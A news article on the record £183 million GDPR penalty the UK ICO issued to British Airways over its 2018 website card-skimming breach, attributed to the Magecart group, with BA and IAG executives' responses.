British Airways Handed Record £183 Million GDPR Penalty

The UK GDPR supervisory authority has issued the largest ever GDPR financial penalty to date. British Airways has been fined £183 million ($229 million) for GDPR compliance failures related to last year’s cyberattack on its website.

While the financial penalty is high, it could’ve been considerably higher. The Information Commissioners Office (ICO) has the authority to issue a financial penalty of up to €20 million or 4% of BA’s global annual turnover. £183 million is just 1.5% of BA’s global annual turnover for 2017.

The previous record fine was issued to Facebook over the Cambridge Analytica scandal, although the size of that fine was limited as the breach occurred prior to May 25, 2018 when the new GDPR came into effect.

The breach at BA occurred between August 21 and September 5, 2018. According to BA, the breach affected 380,000 booking transactions and resulted in the theft of customers’ names, addresses, bank card numbers, expiry dates, and CVV codes. The breach was reported to ICO within 24 hours of the breach occurring, well inside the 72-hour time limit of GDPR.

An analysis of the breach suggests the same threat actors that conducted the cyberattack on Ticketmaster in June were behind the attack – A threat group known as Magecart. Magecart specializes in skimming credit card details from unsecured website payment forms using an attack method called cross-site scripting. When visitors enter information on a compromised website, all information entered is captured.

BA has apologized to customer for the breach and has already agreed to cover losses suffered by customers. “British Airways responded quickly to a criminal act to steal customers’ data. We have found no evidence of fraud/fraudulent activity on accounts linked to the theft,” said BA chairman and chief executive, Alex Cruz.

BA has up to 28 days to launch an appeal against the GDPR penalty. “We intend to take all appropriate steps to defend the airline’s position vigorously, including making any necessary appeals,” said Willie Walsh, chief executive of International Airlines Group (IAG), the multi-national holding company with a majority stake in BA.

GDPR Compliance Checklist

Got customers in Europe?
Your American company may be required by law to comply with GDPR.

Thank You

How we use your data
Immediate Access.
Confidentiality guaranteed.

GDPR Compliance Checklist

Got customers in Europe?
Your American company may be required by law to comply with GDPR.

Thank You

How we use your data
Immediate Access.
Confidentiality guaranteed.